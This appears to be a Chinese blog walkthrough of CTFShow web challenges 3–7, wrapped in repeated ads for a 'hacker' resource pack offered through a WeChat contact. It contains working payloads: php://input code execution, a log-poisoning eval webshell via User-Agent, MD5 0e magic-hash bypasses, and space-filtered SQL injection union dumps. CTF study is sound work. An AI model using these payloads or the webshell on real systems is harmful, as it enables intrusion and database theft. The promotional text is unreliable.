给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网络安全面试题
绿盟护网行动
还有大家最喜欢的黑客技术
网络安全源码合集+工具包
所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
CTFShow web3
第三关是一个文件包含漏洞, 推荐使用PHP://input伪协议进行任意代码执行
在url的参数中提交PHP伪协议
?url=php://input
使用代理工具( Burp Suite)抓包, 在POST请求体中输入需要执行的PHP代码, 比如执行系统命令:查看当前目录下的文件
<?php system('ls');?>
当前目录下有两个文件, 目测flag就在 ctf_go_go_go 文件中
接下来我们查看 ctf_go_go_go 文件, 获取 flag, url的参数中使用PHP伪协议
?url=php://input
使用代理工具( Burp Suite)拦截请求, 在POST请求体中传递需要执行的PHP代码
<?php system('cat ctf\_go\_go\_go');?>
成功拿到 flag
CTFShow web4
第四关也是一个文件包含漏洞, 与第三关不同的是, 这一关过滤了PHP伪协议, 推荐使用日志注入
1.首先, 访问一下web服务器的日志文件( Nginx日志文件的默认位置是/var/log/nginx/access.log)
?url=/var/log/nginx/access.log
2.使用代理工具( Burp Suite)在请求头User-Agent的内容中插入后门
<?php eval($\_POST['a']);?>
3.再次访问日志文件, 会发现新增了一条访问记录, 后门代码不会在页面中显示, 因为代码会被直接执行, 加下来我们使用蚁剑等工具链接后门即可
4.使用蚁剑的文件管理功能, 在网站根目录( www)下有一个 falg.txt, flag就在这个文件里面
CTFShow web5
第五关是一个MD5加密漏洞, 这一关需要传递两个参数, 如果两个参数的MD5值相等, 即可输出 flag, 推荐使用0e绕过
payload如下
?v1=QNKCDZO&v2=240610708
CTFShow web6
第六关是一个SQL注入漏洞, 注入类型为数值型注入, 页面有回显, 推荐使用联合注入, 源码中过滤了空格, 可以使用注释/**/ 或 括号() 来绕过
1.使用万能账号测试注入点
括号()绕过, 用户名输入以下payload, 密码不用输
a'or(true)#
注释/**/绕过
a'/\*\*/or/\*\*/true/\*\*/#
页面有显示位( 查询出来的用户在页面的固定位置展示), 推荐使用联合注入
2.脱库
获取当前数据库, 盲猜 flag 就在当前使用的数据库中, 用户名输入以下payload, 密码不用输
a'union/\*\*/select/\*\*/1,database(),3#
获取数据库中的表
a'union/\*\*/select/\*\*/1,(select(group\_concat(table\_name))from/\*\*/information\_schema.tables/\*\*/where/\*\*/table\_schema='web2'),3#
获取表中的字段
a'union/\*\*/select/\*\*/1,(select(group\_concat(column\_name))from/\*\*/information\_schema.columns/\*\*/where/\*\*/table\_schema='web2'and/\*\*/table\_name='flag'),3#
获取 flag
a'union/\*\*/select/\*\*/1,(select/\*\*/flag/\*\*/from/\*\*/flag),3#
CTFShow web7
第七关也是一个SQL注入漏洞, 注入点是数值型注入, 页面有回显, 推荐使用联合注入, 源码中过滤了空格, 可以使用注释/**/ 或 括号() 来绕过
1.判断注入点
url地址栏中输入以下payload, 是SQL恒成立, 可以查询到所有文章内容, 由此可证明存在SQL注入
?id=-1/\*\*/or/\*\*/true
页面存在显示位( 文章标题和文章内容在固定位置展示), 推荐使用联合注入
2.脱库
获取当前数据库, url中输入以下payload
-1/\*\*/union/\*\*/select/\*\*/1,database(),3
获取数据库中的表
-1/\*\*/union/\*\*/select/\*\*/1,(select/\*\*/group\_concat(table_name)from/\*\*/information_schema.tables/\*\*/where/\*\*/table_schema="web7"),3
获取表中的字段
-1/\*\*/union/\*\*/select/\*\*/1,(select/\*\*/group\_concat(column_name)from/\*\*/information_schema.columns/\*\*/where/\*\*/table_schema="web7"and/\*\*/table_name="flag"),3
获取 flag
-1/\*\*/union/\*\*/select/\*\*/1,(select/\*\*/flag/\*\*/from/\*\*/flag),3
原理剖析
解题过程中用到了两种文件包含漏洞的利用方式, 一种MD5加密的绕过方式, 一种SQL注入漏洞的绕过方式, 接下来, 针对这几种方式的实现原理解释一下
php://input伪协议
php://input伪协议是文件包含漏洞的一种利用方式, 在url的参数中使用伪协议时, 会将POST请求体中的内容当做文件来执行, 如果POST请求体中包含代码, 则代码会被正常执行, 从而造成任意代码执行, 具体使用情况参考web3的解题思路
日志注入
日志注入是文件包含漏洞的一种利用方式, web服务器的日志文件会保存网站的访问记录, 包括请求的源地址, 时间, 请求方式, User-Agent, Referer等HTTP请求头, 如果在这些请求头中插入代码, 则代码会被保存在web服务器的日志文件中, 当我们访问日志文件的时候, 文件中的代码则会被执行
本次用到了一个Nginx日志文件的默认路径:/var/log/nginx/access.log
MD5加密漏洞-0e绕过
md5()函数在加密时存在一些漏洞, 这主要是因为PHP在使用来比较字符串时, 如果字符串是以0e开头, 则会被当做科学计数法, 结果转换为0
比如web5中, 两个参数经过md5()函数加密后, 都是0e开头, 在参与PHP的比较时, 都会转换为0, 结果会变成0=0, 从而使比较成立, 除了上面使用的两个值以外, md5()函数加密后以0e开头的值还有
QNKCDZO
240610708
byGcY
sonZ7y
aabg7XSs
aabC9RqS
s878926199a
s155964671a
s214587387a
s1091221200a
过滤空格的绕过方式
一、网安学习成长路线图
网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
二、网安视频合集
观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
三、精品网安学习书籍
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
四、网络安全源码合集+工具包
光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)
五、网络安全面试题
最后就是大家最关心的网络安全面试题板块
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
扫一扫
1016
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
